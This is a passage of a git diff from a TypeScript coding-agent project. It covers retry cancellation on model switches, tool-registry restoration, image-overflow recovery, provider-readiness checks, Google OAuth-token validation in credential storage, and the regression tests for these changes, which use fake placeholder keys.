2.0.2 - - graceful-fs@4.2.11: {} - - hosted-git-info@9.0.2: - dependencies: - lru-cache: 11.2.7 - - ieee754@1.2.1: {} - - ignore@7.0.5: {} - - lru-cache@11.2.7: {} - - marked@15.0.12: {} - - minimatch@10.2.4: - dependencies: - brace-expansion: 5.0.4 - - minipass@7.1.3: {} - - ms@2.1.3: {} - - once@1.4.0: - dependencies: - wrappy: 1.0.2 - - path-scurry@2.0.2: - dependencies: - lru-cache: 11.2.7 - minipass: 7.1.3 - - pend@1.2.0: {} - - proper-lockfile@4.1.2: - dependencies: - graceful-fs: 4.2.11 - retry: 0.12.0 - signal-exit: 3.0.7 - - pump@3.0.4: - dependencies: - end-of-stream: 1.4.5 - once: 1.4.0 - - retry@0.12.0: {} - - signal-exit@3.0.7: {} - - sql.js@1.14.1: {} - - std-env@3.10.0: {} - - strip-ansi@7.2.0: - dependencies: - ansi-regex: 6.2.2 - - strtok3@10.3.4: - dependencies: - '@tokenizer/token': 0.3.0 - - token-types@6.1.2: - dependencies: - '@borewit/text-codec': 0.2.2 - '@tokenizer/token': 0.3.0 - ieee754: 1.2.1 - - uint8array-extras@1.5.0: {} - - undici-types@7.18.2: {} - - undici@7.24.4: {} - - wrappy@1.0.2: {} - - yaml@2.8.2: {} - - yauzl@2.10.0: - dependencies: - buffer-crc32: 0.2.13 - fd-slicer: 1.1.0 - - yoctocolors@2.1.2: {} diff --git a/packages/pi-coding-agent/src/cli/args.ts b/packages/pi-coding-agent/src/cli/args.ts index 101e67da5..cd056d5d8 100644 --- a/packages/pi-coding-agent/src/cli/args.ts +++ b/packages/pi-coding-agent/src/cli/args.ts @@ -49,6 +49,8 @@ export interface Args { fileArgs: string[]; /** Unknown flags (potentially extension flags) - map of flag name to value */ unknownFlags: Map; + /** --bare: suppress CLAUDE.md/AGENTS.md, user skills, prompt templates, themes, project preferences */ + bare?: boolean; } const VALID_THINKING_LEVELS = ["off", "minimal", "low", "medium", "high", "xhigh"] as const; @@ -169,6 +171,8 @@ export function parseArgs(args: string[], extensionFlags?: Map { + const start = source.indexOf("private async _applyModelChange("); + assert.ok(start >= 0, "missing _applyModelChange"); + const window = 
source.slice(start, start + 900); + const abortIdx = window.indexOf("this._retryHandler.abortRetry();"); + const setModelIdx = window.indexOf("this.agent.setModel(model);"); + + assert.ok(abortIdx >= 0, "_applyModelChange should cancel any in-flight retry"); + assert.ok(setModelIdx >= 0, "_applyModelChange should set the new model"); + assert.ok( + abortIdx < setModelIdx, + "retry cancellation must happen before applying the new model to prevent stale provider retries", + ); +}); diff --git a/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts new file mode 100644 index 000000000..f1a14a15b --- /dev/null +++ b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts @@ -0,0 +1,64 @@ +// GSD-2 — Regression tests for #3616: tool list persistence across newSession() calls +// Copyright (c) 2026 Jeremy McSpadden + +import test, { describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join } from "node:path"; + +const source = readFileSync( + join(process.cwd(), "packages/pi-coding-agent/src/core/agent-session.ts"), + "utf-8", +); + +describe("#3616 — newSession() must restore full tool set", () => { + test("newSession() calls _refreshToolRegistry with includeAllExtensionTools when cwd is unchanged", () => { + // Find the newSession method + const newSessionStart = source.indexOf("async newSession(options?:"); + assert.ok(newSessionStart >= 0, "should find newSession method"); + + // Get the method body (up to the next top-level method) + const methodBody = source.slice(newSessionStart, newSessionStart + 3000); + + // Verify the cwd-changed branch rebuilds tools + assert.ok( + methodBody.includes("if (this._cwd !== previousCwd)"), + "should have cwd-change guard", + ); + + // Verify the else branch exists and refreshes tools with includeAllExtensionTools + const elseIdx = methodBody.indexOf("} else {"); + 
assert.ok(elseIdx >= 0, "should have else branch for cwd-unchanged case"); + + const elseBranch = methodBody.slice(elseIdx, elseIdx + 800); + assert.ok( + elseBranch.includes("_refreshToolRegistry"), + "else branch should call _refreshToolRegistry", + ); + assert.ok( + elseBranch.includes("includeAllExtensionTools: true"), + "else branch should pass includeAllExtensionTools: true to restore narrowed tools", + ); + }); + + test("newSession() references #3616 in the else-branch comment", () => { + const idx = source.indexOf("#3616"); + assert.ok(idx >= 0, "source should reference issue #3616 for the tool restore fix"); + }); + + test("agent.reset() does not clear _state.tools (tools persist across reset)", () => { + // This is a structural invariant — if reset() starts clearing tools, + // the newSession() refresh becomes the only defense against tool loss. + const agentSource = readFileSync( + join(process.cwd(), "packages/pi-agent-core/src/agent.ts"), + "utf-8", + ); + const resetStart = agentSource.indexOf("reset()"); + assert.ok(resetStart >= 0, "should find reset() method"); + const resetBody = agentSource.slice(resetStart, resetStart + 400); + assert.ok( + !resetBody.includes("tools"), + "reset() should NOT touch _state.tools — tools are managed by agent-session", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/agent-session.ts b/packages/pi-coding-agent/src/core/agent-session.ts index 03389954f..782ecd04e 100644 --- a/packages/pi-coding-agent/src/core/agent-session.ts +++ b/packages/pi-coding-agent/src/core/agent-session.ts @@ -72,6 +72,7 @@ import type { ModelRegistry } from "./model-registry.js"; import { expandPromptTemplate, type PromptTemplate } from "./prompt-templates.js"; import type { ResourceExtensionPaths, ResourceLoader } from "./resource-loader.js"; import { RetryHandler } from "./retry-handler.js"; +import { isImageDimensionError, downsizeConversationImages } from "./image-overflow-recovery.js"; import type { BranchSummaryEntry, 
SessionManager } from "./session-manager.js"; import { getLatestCompactionEntry } from "./session-manager.js"; import type { SettingsManager } from "./settings-manager.js"; @@ -136,7 +137,8 @@ export type AgentSessionEvent = | { type: "auto_retry_end"; success: boolean; attempt: number; finalError?: string } | { type: "fallback_provider_switch"; from: string; to: string; reason: string } | { type: "fallback_provider_restored"; provider: string; reason: string } - | { type: "fallback_chain_exhausted"; reason: string }; + | { type: "fallback_chain_exhausted"; reason: string } + | { type: "image_overflow_recovery"; strippedCount: number; imageCount: number }; /** Listener function for agent session events */ export type AgentSessionEventListener = (event: AgentSessionEvent) => void; @@ -164,6 +166,9 @@ export interface AgentSessionConfig { baseToolsOverride?: Record; /** Mutable ref used by Agent to access the current ExtensionRunner */ extensionRunnerRef?: { current?: ExtensionRunner }; + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Passed through to RetryHandler for third-party block recovery (#3772). */ + isClaudeCodeReady?: () => boolean; } export interface ExtensionBindings { @@ -255,6 +260,10 @@ export class AgentSession { private _cumulativeOutputTokens = 0; private _cumulativeToolCalls = 0; + /** Cost of the most recent assistant response (for per-prompt display). 
*/ + private _lastTurnCost = 0; + + // Bash execution state private _bashAbortController: AbortController | undefined = undefined; private _pendingBashMessages: BashExecutionMessage[] = []; @@ -318,6 +327,7 @@ export class AgentSession { getSessionId: () => this.sessionId, emit: (event) => this._emit(event), onModelChange: (model) => this.sessionManager.appendModelChange(model.provider, model.id), + isClaudeCodeReady: config.isClaudeCodeReady, }); this._compactionOrchestrator = new CompactionOrchestrator({ @@ -454,6 +464,7 @@ export class AgentSession { // Accumulate session stats that survive compaction (#1423) const assistantMsg = event.message as AssistantMessage; + this._lastTurnCost = assistantMsg.usage?.cost?.total ?? 0; this._cumulativeCost += assistantMsg.usage?.cost?.total ?? 0; this._cumulativeInputTokens += assistantMsg.usage?.input ?? 0; this._cumulativeOutputTokens += assistantMsg.usage?.output ?? 0; @@ -482,6 +493,36 @@ export class AgentSession { if (didRetry) return; // Retry was initiated, don't proceed to compaction } + // Check for image dimension overflow (many-image 400 error). + // When a session accumulates many images, the API rejects requests + // whose images exceed the many-image dimension limit. Strip older + // images from the conversation and auto-retry. 
(#2874) + if ( + msg.stopReason === "error" && + isImageDimensionError(msg.errorMessage) + ) { + const messages = this.agent.state.messages; + const result = downsizeConversationImages(messages as Message[]); + if (result.processed) { + // Remove the trailing error assistant message, then replace + if (messages.length > 0 && messages[messages.length - 1].role === "assistant") { + this.agent.replaceMessages(messages.slice(0, -1)); + } + + this._emit({ + type: "image_overflow_recovery", + strippedCount: result.strippedCount, + imageCount: result.imageCount, + }); + + // Auto-retry after downsizing + setTimeout(() => { + this.agent.continue().catch(() => {}); + }, 0); + return; + } + } + await this._compactionOrchestrator.checkCompaction(msg); } } @@ -687,6 +728,8 @@ export class AgentSession { * Call this when completely done with the session. */ dispose(): void { + this._extensionErrorUnsubscriber?.(); + this._extensionErrorUnsubscriber = undefined; this._disconnectFromAgent(); this._eventListeners = []; } @@ -1047,9 +1090,8 @@ export class AgentSession { }); } - // Validate API key - const apiKey = await this._modelRegistry.getApiKey(this.model, this.sessionId); - if (!apiKey) { + // Validate provider readiness + if (!this._modelRegistry.isProviderRequestReady(this.model.provider)) { const isOAuth = this._modelRegistry.isUsingOAuth(this.model); if (isOAuth) { throw new Error( @@ -1539,6 +1581,16 @@ export class AgentSession { activeToolNames: this.getActiveToolNames(), includeAllExtensionTools: true, }); + } else { + // Even when cwd hasn't changed, restore the full tool set (#3616). + // Extensions (e.g., discuss flows) may narrow the active tool list + // via setActiveTools() during a session. Without this refresh, the + // narrowed set persists into the next session — causing tools like + // gsd_plan_slice to be missing from auto-mode subagent sessions. 
+ this._refreshToolRegistry({ + activeToolNames: this.getActiveToolNames(), + includeAllExtensionTools: true, + }); } // Run setup callback if provided (e.g., to append initial messages) @@ -1595,6 +1647,10 @@ export class AgentSession { options?: { persist?: boolean }, ): Promise { const previousModel = this.model; + // Explicit model switches must cancel any in-flight retry loop from the + // previous provider/model. Otherwise stale provider backoff errors can + // continue to land after the user or runtime has already switched models. + this._retryHandler.abortRetry(); this.agent.setModel(model); this.sessionManager.appendModelChange(model.provider, model.id); if (options?.persist !== false) { @@ -1607,12 +1663,11 @@ export class AgentSession { /** * Set model directly. - * Validates API key, saves to session and settings. - * @throws Error if no API key available for the model + * Validates provider readiness, saves to session and settings. + * @throws Error if provider is not ready (missing credentials for apiKey/oauth providers) */ async setModel(model: Model, options?: { persist?: boolean }): Promise { - const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); - if (!apiKey) { + if (!this._modelRegistry.isProviderRequestReady(model.provider)) { throw new Error(`No API key for ${model.provider}/${model.id}`); } @@ -1633,30 +1688,14 @@ export class AgentSession { return this._cycleAvailableModel(direction, options); } - private async _getScopedModelsWithApiKey(): Promise; thinkingLevel?: ThinkingLevel }>> { - const apiKeysByProvider = new Map(); - const result: Array<{ model: Model; thinkingLevel?: ThinkingLevel }> = []; - - for (const scoped of this._scopedModels) { - const provider = scoped.model.provider; - let apiKey: string | undefined; - if (apiKeysByProvider.has(provider)) { - apiKey = apiKeysByProvider.get(provider); - } else { - apiKey = await this._modelRegistry.getApiKeyForProvider(provider, this.sessionId); - 
apiKeysByProvider.set(provider, apiKey); - } - - if (apiKey) { - result.push(scoped); - } - } - - return result; + private _getReadyScopedModels(): Array<{ model: Model; thinkingLevel?: ThinkingLevel }> { + return this._scopedModels.filter((scoped) => + this._modelRegistry.isProviderRequestReady(scoped.model.provider), + ); } private async _cycleScopedModel(direction: "forward" | "backward", options?: { persist?: boolean }): Promise { - const scopedModels = await this._getScopedModelsWithApiKey(); + const scopedModels = this._getReadyScopedModels(); if (scopedModels.length <= 1) return undefined; const currentModel = this.model; @@ -1687,11 +1726,6 @@ export class AgentSession { const nextIndex = direction === "forward" ? (currentIndex + 1) % len : (currentIndex - 1 + len) % len; const nextModel = availableModels[nextIndex]; - const apiKey = await this._modelRegistry.getApiKey(nextModel, this.sessionId); - if (!apiKey) { - throw new Error(`No API key for ${nextModel.provider}/${nextModel.id}`); - } - const thinkingLevel = this._getThinkingLevelForModelSwitch(); await this._applyModelChange(nextModel, thinkingLevel, "cycle", options); @@ -1928,7 +1962,11 @@ export class AgentSession { runner.setUIContext(this._extensionUIContext); runner.bindCommandContext(this._extensionCommandContextActions); - this._extensionErrorUnsubscriber?.(); + try { + this._extensionErrorUnsubscriber?.(); + } catch { + // Ignore errors from previous unsubscriber + } this._extensionErrorUnsubscriber = this._extensionErrorListener ? 
runner.onError(this._extensionErrorListener) : undefined; @@ -1998,6 +2036,11 @@ export class AgentSession { const messages = this.agent.state.messages; const last = messages[messages.length - 1]; if (last?.role === "assistant" && (last as AssistantMessage).stopReason === "error") { + // If the error was an image dimension overflow, downsize images + // before retrying so the retry doesn't hit the same error (#2874) + if (isImageDimensionError((last as AssistantMessage).errorMessage)) { + downsizeConversationImages(messages as Message[]); + } this.agent.replaceMessages(messages.slice(0, -1)); this.agent.continue().catch((err) => { runner.emitError({ @@ -2026,8 +2069,7 @@ export class AgentSession { refreshTools: () => this._refreshToolRegistry(), getCommands, setModel: async (model, options) => { - const key = await this.modelRegistry.getApiKey(model, this.sessionId); - if (!key) return false; + if (!this.modelRegistry.isProviderRequestReady(model.provider)) return false; await this.setModel(model, options); return true; }, @@ -2250,7 +2292,7 @@ export class AgentSession { async executeBash( command: string, onChunk?: (chunk: string) => void, - options?: { excludeFromContext?: boolean; operations?: BashOperations }, + options?: { excludeFromContext?: boolean; operations?: BashOperations; loginShell?: boolean }, ): Promise { this._bashAbortController = new AbortController(); @@ -2267,6 +2309,7 @@ export class AgentSession { : await executeBashCommand(resolvedCommand, { onChunk, signal: this._bashAbortController.signal, + loginShell: options?.loginShell, }); this.recordBashResult(command, result, options); @@ -2597,10 +2640,10 @@ export class AgentSession { let summaryDetails: unknown; if (options.summarize && entriesToSummarize.length > 0 && !extensionSummary) { const model = this.model!; - const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); - if (!apiKey) { + if (!this._modelRegistry.isProviderRequestReady(model.provider)) { throw new 
Error(`No API key for ${model.provider}`); } + const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId); const branchSummarySettings = this.settingsManager.getBranchSummarySettings(); const result = await generateBranchSummary(entriesToSummarize, { model, @@ -2774,6 +2817,14 @@ export class AgentSession { }; } + /** + * Get the cost of the most recent assistant response. + * Returns 0 if no assistant message has been received yet. + */ + getLastTurnCost(): number { + return this._lastTurnCost; + } + getContextUsage(): ContextUsage | undefined { const model = this.model; if (!model) return undefined; diff --git a/packages/pi-coding-agent/src/core/auth-storage.test.ts b/packages/pi-coding-agent/src/core/auth-storage.test.ts index f91947ca9..a0d2cab20 100644 --- a/packages/pi-coding-agent/src/core/auth-storage.test.ts +++ b/packages/pi-coding-agent/src/core/auth-storage.test.ts @@ -263,6 +263,152 @@ describe("AuthStorage — areAllCredentialsBackedOff", () => { }); }); +// ─── mismatched oauth credential for non-OAuth provider (#2083) ─────────────── + +describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () => { + it("returns undefined when openrouter has type:oauth (no registered OAuth provider)", async (t) => { + // Simulates the bug: OpenRouter credential stored as type:"oauth" + // but OpenRouter is not a registered OAuth provider. + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Isolate from any real OPENROUTER_API_KEY in the environment so the + // fall-through to env / fallback finds nothing and returns undefined. 
+ const origEnv = process.env.OPENROUTER_API_KEY; + delete process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + // Before the fix, getApiKey returns undefined because + // resolveCredentialApiKey calls getOAuthProvider("openrouter") → null → undefined. + // The key in the oauth credential is never extracted. + const key = await storage.getApiKey("openrouter"); + // After the fix, the oauth credential with an unrecognised provider + // should be skipped, and getApiKey should fall through to env / fallback. + // With no env var and no fallback resolver configured, the result is undefined. + assert.equal(key, undefined); + }); + + it("falls through to env var when openrouter has type:oauth credential", async (t) => { + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Simulate OPENROUTER_API_KEY being set via env + const origEnv = process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key"; + const key = await storage.getApiKey("openrouter"); + assert.equal(key, "sk-or-v1-env-key"); + }); + + it("falls through to fallback resolver when openrouter has type:oauth credential", async (t) => { + const storage = inMemory({ + openrouter: { + type: "oauth", + access_token: "sk-or-v1-fake", + refresh_token: "rt-fake", + expires: Date.now() + 3_600_000, + }, + }); + + // Isolate from any real OPENROUTER_API_KEY so env fallback is skipped + // and the fallback resolver is reached. 
+ const origEnv = process.env.OPENROUTER_API_KEY; + delete process.env.OPENROUTER_API_KEY; + t.after(() => { + if (origEnv === undefined) { + delete process.env.OPENROUTER_API_KEY; + } else { + process.env.OPENROUTER_API_KEY = origEnv; + } + }); + + storage.setFallbackResolver((provider) => + provider === "openrouter" ? "sk-or-v1-fallback" : undefined, + ); + + const key = await storage.getApiKey("openrouter"); + assert.equal(key, "sk-or-v1-fallback"); + }); +}); + +// ─── Gemini CLI OAuth token detection ───────────────────────────────────────── + +describe("AuthStorage — Gemini CLI OAuth token detection", () => { + it("rejects Google OAuth access token (ya29. prefix) stored as api_key for google provider", () => { + const storage = inMemory({}); + assert.throws( + () => storage.set("google", makeKey("ya29.a0ARrdaM_fake_oauth_token_from_gemini_cli")), + (err: Error) => { + assert.ok(err.message.includes("OAuth access token"), `Expected message about OAuth token, got: ${err.message}`); + assert.ok( + err.message.includes("GEMINI_API_KEY") || err.message.includes("google-gemini-cli"), + `Expected guidance about GEMINI_API_KEY or google-gemini-cli, got: ${err.message}`, + ); + return true; + }, + ); + }); + + it("rejects Google OAuth access token for google provider via getApiKey when set as env var", async () => { + const storage = inMemory({}); + // Simulate runtime override with OAuth token + storage.setRuntimeApiKey("google", "ya29.c.b0AXv0zTPQ_fake_oauth_token"); + const key = await storage.getApiKey("google"); + // Should return undefined (blocked) or throw + assert.equal(key, undefined, "OAuth token should be blocked for google provider"); + }); + + it("allows legitimate Google API keys (AIza prefix) for google provider", () => { + const storage = inMemory({}); + storage.set("google", makeKey("AIzaSyD_fake_legitimate_api_key_here")); + const creds = storage.getCredentialsForProvider("google"); + assert.equal(creds.length, 1); + }); + + it("allows ya29 tokens 
for google-gemini-cli provider (OAuth is expected there)", () => { + // google-gemini-cli stores OAuth credentials with type: "oauth", not "api_key" + // But if someone somehow stored an api_key, it shouldn't be blocked for OAuth providers + const storage = inMemory({}); + storage.set("google-gemini-cli", makeKey("ya29.a0ARrdaM_token_for_gemini_cli")); + const creds = storage.getCredentialsForProvider("google-gemini-cli"); + assert.equal(creds.length, 1); + }); + + it("rejects Google OAuth token (ya29. prefix) for openai provider that uses GEMINI_API_KEY indirectly", () => { + // Only google provider should be blocked, not others + const storage = inMemory({}); + // This should NOT throw - other providers can have whatever keys they want + storage.set("openai", makeKey("ya29.some_value")); + const creds = storage.getCredentialsForProvider("openai"); + assert.equal(creds.length, 1); + }); +}); + // ─── getAll truncation ──────────────────────────────────────────────────────── describe("AuthStorage — getAll()", () => { diff --git a/packages/pi-coding-agent/src/core/auth-storage.ts b/packages/pi-coding-agent/src/core/auth-storage.ts index e921328f2..fb1532252 100644 --- a/packages/pi-coding-agent/src/core/auth-storage.ts +++ b/packages/pi-coding-agent/src/core/auth-storage.ts @@ -34,6 +34,46 @@ export type OAuthCredential = { export type AuthCredential = ApiKeyCredential | OAuthCredential; +// ============================================================================ +// Google OAuth token detection +// ============================================================================ + +/** + * Providers that use Google AI Studio API keys (not OAuth tokens). + * OAuth access tokens (ya29.*) are not valid API keys for these providers. + */ +const GOOGLE_API_KEY_PROVIDERS = new Set(["google"]); + +/** + * Detect if a string is a Google OAuth access token rather than an API key. + * Google OAuth access tokens start with "ya29." 
— these are issued by + * Google's OAuth2 token endpoint and are not valid as AI Studio API keys. + * + * Users who installed Google's Gemini CLI may have these tokens and + * mistakenly set them as GEMINI_API_KEY. + */ +export function isGoogleOAuthToken(key: string): boolean { + return key.startsWith("ya29."); +} + +/** + * Validate that an API key is not a Google OAuth token being used for + * a provider that requires actual API keys (e.g., Google AI Studio). + * Throws a descriptive error if the key appears to be an OAuth token. + */ +function validateNotGoogleOAuthToken(provider: string, key: string): void { + if (GOOGLE_API_KEY_PROVIDERS.has(provider) && isGoogleOAuthToken(key)) { + throw new Error( + `The provided key for "${provider}" appears to be a Google OAuth access token (ya29.*), ` + + `not a valid API key. Google AI Studio requires an API key starting with "AIza...". ` + + `\n\nIf you're using Google's Gemini CLI, its OAuth tokens are not compatible. ` + + `Either:\n` + + ` 1. Get an API key from https://aistudio.google.com/apikey and set GEMINI_API_KEY\n` + + ` 2. Use '/login google-gemini-cli' to authenticate via Cloud Code Assist`, + ); + } +} + /** * On-disk format: each provider maps to a single credential or an array of credentials. * Single credentials are normalized to arrays at load time for internal use. @@ -202,6 +242,7 @@ export class AuthStorage { private fallbackResolver?: (provider: string) => string | undefined; private loadError: Error | null = null; private errors: Error[] = []; + private credentialChangeListeners: Set<() => void> = new Set(); /** * Round-robin index per provider. Incremented on each call to getApiKey @@ -263,6 +304,25 @@ export class AuthStorage { this.fallbackResolver = resolver; } + /** + * Register a callback to be notified when credentials change (e.g., after OAuth token refresh). + * Returns a function to unregister the listener. 
+ */ + onCredentialChange(listener: () => void): () => void { + this.credentialChangeListeners.add(listener); + return () => this.credentialChangeListeners.delete(listener); + } + + private notifyCredentialChange(): void { + for (const listener of this.credentialChangeListeners) { + try { + listener(); + } catch { + // Don't let listener errors break the refresh flow + } + } + } + private recordError(error: unknown): void { const normalizedError = error instanceof Error ? error : new Error(String(error)); this.errors.push(normalizedError); @@ -340,6 +400,9 @@ export class AuthStorage { */ set(provider: string, credential: AuthCredential): void { if (credential.type === "api_key") { + // Block Google OAuth tokens being stored as API keys for AI Studio providers + validateNotGoogleOAuthToken(provider, credential.key); + const existing = this.getCredentialsForProvider(provider); // Deduplicate: don't add if same key already exists const isDuplicate = existing.some( @@ -667,6 +730,11 @@ export class AuthStorage { return { result: refreshed, next: JSON.stringify(merged, null, 2) }; }); + // Notify listeners after credential change (e.g., model registry refresh) + if (result) { + queueMicrotask(() => this.notifyCredentialChange()); + } + return result; } @@ -719,10 +787,34 @@ export class AuthStorage { * @param providerId - The provider to get an API key for * @param sessionId - Optional session ID for sticky credential selection */ - async getApiKey(providerId: string, sessionId?: string): Promise { + async getApiKey(providerId: string, sessionId?: string, options?: { baseUrl?: string }): Promise { + // If the model has a local baseUrl, return a dummy key to avoid auth blocking + if (options?.baseUrl) { + try { + const hostname = new URL(options.baseUrl).hostname; + if (hostname === "localhost" || hostname === "127.0.0.1" || hostname === "0.0.0.0" || hostname === "::1") { + return "local-no-key-needed"; + } + } catch { + if (options.baseUrl.startsWith("unix:")) { + 
return "local-no-key-needed"; + } + } + } + // Runtime override takes highest priority const runtimeKey = this.runtimeOverrides.get(providerId); if (runtimeKey) { + // Block Google OAuth tokens used as runtime API key overrides + if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(runtimeKey)) { + this.recordError( + new Error( + `Blocked Google OAuth access token (ya29.*) for provider "${providerId}". ` + + `Use an API key from https://aistudio.google.com/apikey or '/login google-gemini-cli'.`, + ), + ); + return undefined; + } return runtimeKey; } @@ -731,14 +823,29 @@ export class AuthStorage { if (credentials.length > 0) { const index = this.selectCredentialIndex(providerId, credentials, sessionId); if (index >= 0) { - return this.resolveCredentialApiKey(providerId, credentials[index]); + const resolved = await this.resolveCredentialApiKey(providerId, credentials[index]); + if (resolved) return resolved; + // Credential unresolvable (e.g. type:"oauth" for a non-OAuth provider) — + // fall through to env / fallback instead of returning undefined (#2083) } - // All credentials backed off - fall through to env/fallback + // All credentials backed off or unresolvable - fall through to env/fallback } // Fall back to environment variable const envKey = getEnvApiKey(providerId); - if (envKey) return envKey; + if (envKey) { + // Block Google OAuth tokens from environment variables (e.g., GEMINI_API_KEY=ya29.*) + if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(envKey)) { + this.recordError( + new Error( + `GEMINI_API_KEY contains a Google OAuth access token (ya29.*), not an API key. ` + + `Get an API key from https://aistudio.google.com/apikey or use '/login google-gemini-cli'.`, + ), + ); + return undefined; + } + return envKey; + } // Fall back to custom resolver (e.g., models.json custom providers) return this.fallbackResolver?.(providerId) ?? 
undefined; diff --git a/packages/pi-coding-agent/src/core/bash-executor.ts b/packages/pi-coding-agent/src/core/bash-executor.ts index 3931a7a25..f043b9379 100644 --- a/packages/pi-coding-agent/src/core/bash-executor.ts +++ b/packages/pi-coding-agent/src/core/bash-executor.ts @@ -76,11 +76,23 @@ export interface BashResult { * @param options - Optional streaming callback and abort signal * @returns Promise resolving to execution result */ -export function executeBash(command: string, options?: BashExecutorOptions): Promise { +export function executeBash(command: string, options?: BashExecutorOptions & { loginShell?: boolean }): Promise { return new Promise((resolve, reject) => { - const { shell, args } = getShellConfig(); + let shell: string; + let args: string[]; + if (options?.loginShell) { + // Use the user's login shell with -l for PATH/env from shell profiles + shell = process.env.SHELL || "/bin/bash"; + args = ["-l", "-c"]; + } else { + ({ shell, args } = getShellConfig()); + } + // On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can + // cause EINVAL in VSCode/ConPTY terminal contexts. The bg-shell + // extension already guards this (process-manager.ts); align here. + // Process-tree cleanup uses taskkill /F /T on Windows regardless. const child: ChildProcess = spawn(shell, [...args, sanitizeCommand(command)], { - detached: true, + detached: process.platform !== "win32", env: getShellEnv(), stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/blob-store.ts b/packages/pi-coding-agent/src/core/blob-store.ts index 16262c892..9ad9e4f49 100644 --- a/packages/pi-coding-agent/src/core/blob-store.ts +++ b/packages/pi-coding-agent/src/core/blob-store.ts @@ -6,7 +6,7 @@ * provides automatic deduplication across sessions. 
*/ import { createHash } from "node:crypto"; -import { mkdirSync, readdirSync, readFileSync, writeFileSync, existsSync, accessSync, unlinkSync, statSync } from "node:fs"; +import { mkdirSync, readdirSync, readFileSync, writeFileSync, accessSync, unlinkSync, statSync } from "node:fs"; import { join } from "node:path"; const BLOB_PREFIX = "blob:sha256:"; @@ -37,8 +37,11 @@ export class BlobStore { }, }; - if (!existsSync(blobPath)) { - writeFileSync(blobPath, data); + try { + writeFileSync(blobPath, data, { flag: "wx" }); // Atomic: fails if file exists + } catch (err: any) { + if (err.code !== "EEXIST") throw err; + // File already exists — expected for content-addressed storage } return result; } diff --git a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts index 6415f8098..c17de356c 100644 --- a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts +++ b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts @@ -94,10 +94,11 @@ export class CompactionOrchestrator { throw new Error("No model selected"); } - const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); - if (!apiKey) { + if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) { throw new Error(`No API key for ${model.provider}`); } + // undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts) + const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); const pathEntries = this._deps.sessionManager.getBranch(); const settings = this._deps.settingsManager.getCompactionSettings(); @@ -299,11 +300,12 @@ export class CompactionOrchestrator { return; } - const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); - if (!apiKey) { + if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) { this._deps.emit({ type: "auto_compaction_end", result: undefined, 
aborted: false, willRetry: false }); return; } + // undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts) + const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId()); const pathEntries = this._deps.sessionManager.getBranch(); const preparation = prepareCompaction(pathEntries, settings); diff --git a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts index c028dbbd8..cf9c8bc01 100644 --- a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts +++ b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts @@ -64,8 +64,8 @@ export interface CollectEntriesResult { export interface GenerateBranchSummaryOptions { /** Model to use for summarization */ model: Model; - /** API key for the model */ - apiKey: string; + /** API key for the model. Undefined for externalCli/none providers. */ + apiKey: string | undefined; /** Abort signal for cancellation */ signal: AbortSignal; /** Optional custom instructions for summarization */ diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.test.ts b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts new file mode 100644 index 000000000..1fb5a2db2 --- /dev/null +++ b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts @@ -0,0 +1,236 @@ +/** + * Tests for chunked compaction fallback when messages exceed model context window. + * Regression test for #2932. 
+ */ + +import assert from "node:assert/strict"; +import { describe, it, mock } from "node:test"; + +import type { AgentMessage } from "@gsd/pi-agent-core"; +import type { Model, AssistantMessage } from "@gsd/pi-ai"; + +import { generateSummary, estimateTokens, chunkMessages } from "./compaction.js"; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Create a user message with approximately `tokenCount` tokens (chars = tokens * 4). */ +function makeUserMessage(tokenCount: number): AgentMessage { + const text = "x".repeat(tokenCount * 4); + return { role: "user", content: text } as unknown as AgentMessage; +} + +/** Create a mock model with a given context window. */ +function makeModel(contextWindow: number): Model { + return { + id: "test-model", + name: "Test Model", + api: "anthropic-messages", + provider: "anthropic", + baseUrl: "https://api.test", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow, + maxTokens: 4096, + } as 